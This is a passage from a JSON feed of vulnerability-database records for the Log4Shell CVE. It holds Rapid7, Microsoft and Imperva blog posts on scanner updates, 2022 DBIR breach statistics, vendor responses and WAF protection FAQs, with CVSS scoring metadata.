This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now you can configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID, if you want!) when authenticating. You now have visibility into a wider range of deployment configurations of Oracle Database and the ability to configure scans using Service Name or SID.\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process.\n\nWith this update, we are taking more of the burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, it is difficult to keep a check on this manually. 
This update adds the capability to not only look at the version of Log4j present in your environment but also check whether it has been mitigated \u2014 i.e., whether the vulnerable code has been removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities.\n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. [Learn more about Rapid7's response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading:**_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T13:56:09", "description": "\n\nSometimes, data surprises you. When it does, it can force you to rethink your assumptions and second-guess the way you look at the world. But other times, data can reaffirm your assumptions, giving you hard proof they're the right ones \u2014 and providing increased motivation to act decisively based on that outlook.\n\nThe 2022 edition of [Verizon's Data Breach Investigations Report (DBIR)](<https://www.verizon.com/business/en-gb/resources/reports/dbir/>), which looks at data from cybersecurity incidents that occurred in 2021, is a perfect example of this latter scenario. 
This year's DBIR rings many of the same bells that have been resounding in the ears of security pros worldwide for the past 12 to 18 months \u2014 particularly, the threat of [ransomware](<https://www.rapid7.com/solutions/ransomware/>) and the increasing relevance of complex supply chain attacks.\n\nHere are our three big takeaways from the 2022 DBIR, and why we think they should have defenders doubling down on the big cybersecurity priorities of the current moment.\n\n## 1\\. Ransomware's rise is reaffirmed\n\nIn 2021, it was hard to find a cybersecurity headline that didn't somehow pertain to ransomware. It impacted some [80% of businesses last year](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) and threatened some of the institutions most critical to our society, from [primary and secondary schools](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) to [hospitals](<https://www.pewtrusts.org/en/research-and-analysis/blogs/stateline/2022/05/18/ransomware-attacks-on-hospitals-put-patients-at-risk>).\n\nThis year's DBIR confirms that ransomware is the critical threat that security pros and laypeople alike believe it to be. Ransomware-related breaches increased by 13% in 2021, the study found \u2014 that's a greater increase than we saw in the past 5 years _combined_. In fact, nearly 50% of all system intrusion incidents \u2014 i.e., those involving a series of steps by which attackers infiltrate a company's network or other systems \u2014 involved ransomware last year.\n\nWhile the threat has massively increased, the top methods of ransomware delivery remain the ones we're all familiar with: desktop sharing software, which accounted for 40% of incidents, and email at 35%, according to Verizon's data. 
The growing ransomware threat may seem overwhelming, but the most important steps organizations can take to prevent these attacks remain the fundamentals: educating end users on how to spot phishing attempts and maintain security best practices, and equipping infosec teams with the tools needed to detect and respond to suspicious activity.\n\n## 2\\. Attackers are eyeing the supply chain\n\nIn 2021 and 2022, we've been using the term \"supply chain\" more than we ever thought we would. COVID-induced disruptions in the flow of commodities and goods caused [lumber to skyrocket](<https://bdmag.com/lumber-price-volatility-supply-chain/>) and [automakers to run short on microchips](<https://www.consumerreports.org/buying-a-car/global-chip-shortage-makes-it-tough-to-buy-certain-cars-a8160576456/>).\n\nBut security pros have had a slightly different sense of the term on their minds: the software supply chain. Breaches from [Kaseya](<https://www.rapid7.com/blog/post/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) to [SolarWinds](<https://www.rapid7.com/blog/post/2021/01/12/update-on-solarwinds-supply-chain-attack-sunspot-and-new-malware-family-associations/>) \u2014 not to mention the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) \u2014 reminded us all that vendors' systems are just as likely a vector of attack as our own.\n\nUnfortunately, Verizon's Data Breach Investigations Report indicates these incidents are not isolated events \u2014 the software supply chain is, in fact, a major avenue of exploitation by attackers. 
In fact, 62% of cyberattacks that follow the system intrusion pattern began with the threat actors exploiting vulnerabilities in a partner's systems, the study found.\n\nPut another way: If you were targeted with a system intrusion attack last year, it was almost twice as likely that it began on a partner's network than on your own.\n\nWhile supply chain attacks still account for just under 10% of overall cybersecurity incidents, according to the Verizon data, the study authors point out that this vector continues to account for a considerable slice of all incidents each year. That means it's critical for companies to keep an eye on both their own and their vendors' security posture. This could include:\n\n * Demanding visibility into the components behind software vendors' applications\n * Staying consistent with regular patching updates\n * Acting quickly to remediate and emergency-patch when the next major vulnerability that could affect high numbers of web applications rears its head\n\n## 3\\. Mind the app\n\nBetween [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), the past 6 months have jolted developers and security pros alike to the realization that their web apps might contain vulnerable code. This proliferation of new avenues of exploitation is particularly concerning given just how commonly attackers target web apps.\n\nCompromising a web application was far and away the top cyberattack vector in 2021, accounting for roughly 70% of security incidents, according to Verizon's latest DBIR. 
Meanwhile, web servers themselves were the most commonly exploited asset type \u2014 they were involved in nearly 60% of documented breaches.\n\nMore than 80% of attacks targeting web apps involved the use of stolen credentials, emphasizing the importance of user awareness and strong authentication protocols at the endpoint level. That said, 30% of basic web application attacks did involve some form of exploited vulnerability \u2014 a percentage that should be cause for concern.\n\n\"While this 30% may not seem like an extremely high number, the targeting of mail servers using exploits has increased dramatically since last year, when it accounted for only 3% of the breaches,\" the authors of the Verizon DBIR wrote.\n\nThat means vulnerability exploits accounted for a 10 times greater proportion of web application attacks in 2021 than they did in 2022, reinforcing the importance of being able to quickly and efficiently test your applications for the [most common types of vulnerabilities](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) that hackers take advantage of.\n\n## Stay the course\n\nFor those who've been tuned into the current cybersecurity landscape, the key themes of the 2022 Verizon DBIR will likely feel familiar \u2014 and with so many major breaches and vulnerabilities that claimed the industry's attention in 2021, it would be surprising if there were any major curveballs we missed. But the key takeaways from the DBIR remain as critical as ever: Ransomware is a top-priority threat, software supply chains need greater security controls, and web applications remain a key attack vector.\n\nIf your go-forward cybersecurity plan reflects these trends, that means you're on the right track. 
Now is the time to stick to that plan and ensure you have tools and tactics in place that let you focus on the alerts and vulnerabilities that matter most.\n\n_**Additional reading:**_\n\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[Are You in the 2.5% Who Meet This Cybersecurity Job Requirement?](<https://www.rapid7.com/blog/post/2022/05/20/are-you-in-the-2-5-who-meet-this-cybersecurity-job-requirement/>)_\n * _[What's Changed for Cybersecurity in Banking and Finance: New Study](<https://www.rapid7.com/blog/post/2022/05/10/whats-changed-for-cybersecurity-in-banking-and-finance-new-study/>)_\n * _[How to Strategically Scale Vendor Management and Supply Chain Security](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T13:22:17", "type": "rapid7blog", "title": "3 Takeaways From the 2022 Verizon Data Breach Investigations Report", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-31T13:22:17", "id": "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "href": "https://blog.rapid7.com/2022/05/31/3-takeaways-from-the-2022-verizon-data-breach-investigations-report/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2021-12-18T19:10:35", "description": "Published on: 2021 Dec 11, updated 2021 Dec 18. SUMMARY Microsoft continues our analysis of the remote code execution vulnerabilities related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. Currently, Microsoft is not aware of any impact, outside of the initial disclosure involving Minecraft: Java Edition, to the \u2026\n\n[ Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:28:18", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T05:28:18", "id": "MSRC:543F3A129A47F4B14FB170389908717B", "href": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:58:15", "description": "This blog post is an abridged translation of Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2. For the latest information, please refer to the original article.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T08:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T08:00:00", "id": "MSRC:9783BD8B3A34301D0C5C34D252854BDF", "href": 
"/blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2-jp/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-01-13T15:31:17", "description": "We have all heard the saying, \u201cearly detection is critical.\u201d This is true in most aspects of our daily lives; in everything from medical diagnosis, automobile issues, a leaky roof, credit card fraud, etc. It should come as no surprise that this is especially true in the context of [data security breaches](<https://www.imperva.com/solutions/safeguard-sensitive-and-personal-data/>) as well.\n\nFor many years, the cyber security industry has been rallying around the concept of preventing data breaches, and why not? To be sure, this is a reasonable goal for a cyber security team to aspire to achieve. In their effort, cyber security teams set up perimeter defenses, restrict data access, patch vulnerabilities, apply sensors to data movement sensors, encrypt data, etc. - and these are essential things to do. In the real world, however, these teams face the ongoing threats of [zero-day vulnerabilities](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), [phishing attacks](<https://www.imperva.com/learn/application-security/phishing-attack-scam/>), stolen credentials, compromised laptops, poor application design, and a hundred other vectors designed specifically to stop them from achieving their goal. These ongoing threats are dynamic and constant. In a split second, they can render useless the manifold defenses that cyber security teams worked so hard to deploy to secure their data. It\u2019s time for a new mindset around protecting data.\n\n**Early detection: Not just for earthquakes and heart attacks anymore.**\n\nThe aforementioned threats to data security are not new. 
The [Open Web Application Security Project](<https://www.imperva.com/learn/application-security/owasp-top-10/>) (OWASP), a non-profit organization dedicated to helping website owners and security experts protect web applications from [cyber attacks](<https://www.imperva.com/learn/application-security/cyber-attack/>) has been around since 2001. Given that history, you'd think the statement \u201cit\u2019s time for a new mindset around protecting data\u201d would be a foregone conclusion at this point; but, it's not. In some respects, the evolution of data security is akin to the evolution of warfare. As I work with organizations on bolstering their cyber security posture, I am often reminded of Wellington\u2019s comment about Napoleon\u2019s defeat at the 1815 Battle of Waterloo, \u201cThey came on in the same old way and we defeated them in the same old way.\u201d I suspect that had there been hackers in those days, they\u2019d have echoed Wellington\u2019s sentiments. What most organizations need is not \u201cthe same, just more of it\u201d but a new mindset about how we consider gaps and weak spots in data protection today. It\u2019s really time to flip the traditional security paradigm on its head with a revised approach to protecting data, then apps, then endpoints, then the perimeter. Or more simply, a strategy in which protecting data itself is the priority. \n\n\n**Waterloo, 1815. Napoleon did not recognize the need for a new strategic paradigm.**\n\n## What\u2019s the problem?\n\nThe threat landscape changes every day. On December 1, \u201c[CVE-2021-44228](<https://www.imperva.com/blog/log4shell-log4j-remote-code-execution-the-covid-of-the-internet/>)\u201d may well have been the hull classification for a new US Navy ship for all we knew. When you consider new threat vectors every day, the notion of breach prevention almost seems like an outdated philosophy. An effective approach today to protecting sensitive data must be much more agile and dynamic. 
Look at the billions of dollars that enterprises spend to erect fortresses around their data only to be undermined almost daily by a privileged user clicking on a link in an unsolicited email or a missing patch on a router. The reality is that we no longer have black and white boundaries to protect. Instead, we must settle for a more practical and modest goal of minimizing the impact of breaches when they occur - because they will occur!\n\n## Breach detection at the database level is key\n\nOur new paradigm must compel us to focus on early detection of a breach where it matters most: at the database level. Routers, FWs, and laptops are not the hackers\u2019 intended targets. In fact, cybercriminals are not even after your money, directly. Personally identifiable data is far more valuable. As I said, tactics such as protecting the perimeter and deploying web application defenses are important; but at the end of the day, these are all merely entry points from which a cyber attacker can pivot to find and steal the real crown jewels, the concentrated sensitive personal data you keep in databases across your entire architecture. Make no mistake: the goal of most cyber attackers is to identify and exfiltrate customer, patient, payment card or intellectual property information from your data sources because those are precisely the assets that have tangible value in the shadowy depths of the internet. For cyber security practitioners, the process is challenging but very straightforward. Gain visibility into 100% of your data estate and use reliable, automated analytics tools to get a handle on what is normal so you can quickly identify suspicious behavior and orchestrate actions to stop it.\n\n## The negative consequences of doing nothing\n\nThe impact of a breach that goes undetected and results in the compromise and loss of sensitive customer data is far-ranging. The most common impact is financial losses. 
The longer the breach is undetected, the higher the loss potential. These losses range from regulatory fines, identity protection offerings, reputation/confidence damage resulting in lost customers, and now class action lawsuits. Lawsuits that could have been avoided if there was an attempt at \u201cadequate\u201d or \u201creasonable\u201d controls around data which could have reduced the time to detection and minimized the impact of data loss. Of course, there are always secondary impacts in the form of negative brand reputation, high turnover from exhausted security/IT teams, poor corporate morale, etc. The bottom line: the longer you stick to the \u201csame old, same old\u201d and succumb to budget and technology inertia year after year, the more damaging these attacks will be and the more likely they\u2019ll be to pose an existential threat to your enterprise going forward.\n\n**A typical result of years of budget and technology inertia. Spoiler alert: you're the zebra.**\n\nIn this series of blogs, we\u2019ll familiarize you with what a typical attack scenario looks like in today\u2019s threat landscape so you\u2019ll know it when you see it. We\u2019ll explain the core functionalities you need to have today from your database security solution and provide tips and insights into how to build on your existing security posture and put your new solution into practice. 
Watch this space\u2026\n\nThe post [Analytics Are Essential for Effective Database Security](<https://www.imperva.com/blog/analytics-are-essential-for-effective-database-security/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T15:23:02", "type": "impervablog", "title": "Analytics Are Essential for Effective Database Security", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T15:23:02", "id": "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "href": "https://www.imperva.com/blog/analytics-are-essential-for-effective-database-security/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Since it was disclosed on Friday, December 11, I have spoken with many customers about CVE-2021-44228 and the ways Imperva is working to ensure that [they are protected](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>). 
Countless others have contacted us with questions about ways to mitigate the impact from the Log4j vulnerability. \n\nIn the spirit of transparency and information sharing, we\u2019ve aggregated below the most common questions we\u2019ve received to date and the answers we\u2019ve been providing to assist our customers through this time. \n\nThis is a complex and evolving situation -- one that takes partnership, diligence and patience. The global Imperva team is dedicated to helping you. We will continue to keep you informed with additional information as it becomes available.\n\n**Q: What is the state of Imperva\u2019s Application Security product posture?**\n\nA: Imperva Cloud Web Application Firewall (WAF), Imperva WAF Gateway and Imperva RASP were not affected by CVE-2021-44228. All Application Security products have the ability to detect and block exploits targeting the CVE.\n\n**Q: Is Imperva implementing rule changes for the Imperva Cloud Web Application Firewall (WAF) to combat Apache Log4j2?**\n\nA: Absolutely. We\u2019ve deployed a dozen security rule updates since CVE-2021-44228 was disclosed to help our customers mitigate new attack variants.\n\nWe saw initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC. As said in our initial blog post, our existing security rules put in place for Imperva Cloud WAF customers mitigated these early CVE attacks without requiring any patching. \n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 at 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 at 11:44 UTC. \n\nOver the last few days, we\u2019ve detected new variants and responded by creating and deploying updated rules. Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants. 
\n\n**Q: What rule changes are being implemented for Imperva WAF Gateway (GW) to combat Apache Log4j2?**\n\nA: After monitoring initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC, Imperva Threat Research immediately began creating additional security rules for Imperva WAF GW. \n\nManual rules were supplied to Imperva WAF GW customers to mitigate CVE-specific attacks. An Imperva Documentation [knowledge base article](<https://docs.imperva.com/howto/9111b8a5>) (login required) contains the signature information for creating the specific rule. This document was updated as of December 13, 2021 15:30 UTC.\n\nCustomers that have Threat Radar Emergency Feed Services received an initial update with these CVE-specific rules on December 10, 2021 11:30 UTC. As new variants were discovered, updated rules were published to Threat Radar on December 11, 2021 10:30 UTC, December 11, 2021 3:30 UTC and December 13, 2021 12:20 UTC.\n\nCustomers using Imperva Application Defense Center (ADC) were able to receive an update on December 13, 2021 at 10:00 UTC. ADC content can be updated manually or automatically. For information about configuring ADC, please visit the [ADC Update Guide](<https://docs.imperva.com/bundle/v12.6-administration-guide/page/6874.htm>).\n\nJust like for Cloud WAF, Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules for WAF GW based on new attack variants. \n\n**Q: For both Imperva Cloud WAF and Imperva WAF GW, where can I see if I am getting hit by traffic related to this Remote Code Execution (RCE) exploit? 
Is there a dashboard to help me?**\n\nA: Imperva Cloud WAF customers can see the CVE\u2019s activity in Imperva Attack Analytics (screenshot below).\n\nIncidents in Imperva Attack Analytics can be filtered by this specific CVE (screenshot below).\n\nOnce Imperva WAF GW customers establish the appropriate signatures (manually, via Threat Radar or via ADC), they will be able to see alerts and block events within the MX or within their SIEM, where log events are ingested. The default logging templates should include signature names and events like \u201cCVE-2021-44228: Zero day RCE in Log4j2 via LDAP JNDI parser\u201d.\n\n**Q: If I have Imperva RASP deployed across my Java applications, am I protected?**\n\nA: Yes. Given the nature of how Imperva RASP works, RCEs caused by CVE-2021-44228 were stopped without requiring any code changes or policy updates (additional details below). Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected if Imperva RASP is currently deployed.\n\n**Q: What types of vulnerabilities does Imperva RASP protect against out of the box?**\n\nA: Imperva RASP is complementary to Imperva WAF. While the latter keeps bad traffic out, RASP mitigates the risk posed by unknown exploits in first or third-party code/dependencies. By being embedded in the application, RASP has direct visibility into attacks relating to an RCE, which is an advantage for detecting and stopping a specific class of attack.\n\n**Q: Where can I learn more about Imperva RASP?**\n\nA: Imperva RASP is an industry-leading product that is designed to protect against zero-days and the OWASP Top 10 application security threats, injections and weaknesses. Learn more [here](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>).\n\n**Q: Is the Log4j vulnerability impacting any of Imperva's corporate systems (including customer/partner portals and FTP)?**\n\nA: No. 
Imperva worked quickly to update all vulnerable systems immediately after becoming aware of CVE-2021-44228, including third-party vendor solutions. Additionally, Imperva does not have any corporate external systems that are affected by this specific CVE.\n\n**Q: I need assistance or have questions. Who should I contact?**\n\nA: For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F>). If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions ](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:55:49", "type": "impervablog", "title": "Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2021-12-14T22:55:49", "id": "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "href": "https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T14:37:22", "description": "It's been another chaotic year in cybersecurity, as protecting web applications and stopping sensitive data breaches remain top-of-mind issues and continue to generate headline news.\n\nAs 2021 comes to a close, cybersecurity and all the industries it serves are dealing with an unprecedented zero-day vulnerability in the form of CVE-2021-44228 - just 12 months after the Sunburst attack that made global news. While there were many topics that garnered attention this year, here are five that you should follow into 2022.\n\n## 5\\. [**Bad Bot Report 2021: The Pandemic of the Internet**](<https://www.imperva.com/blog/bad-bot-report-2021-the-pandemic-of-the-internet/>)\n\n### Why bad bots deserve your attention\n\nIn 2020, a record-breaking quarter of all internet traffic originated from bad bots, and the malicious traffic they create has wreaked havoc across multiple industries. The **Bad Bot Report 2021** revealed that 57.1 percent of this traffic came from Advanced Persistent Bots (APBs). These bots often avoid detection by cycling through random IP addresses, entering through anonymous proxies, changing their identities, and mimicking human behavior, and they are plaguing websites like never before. 
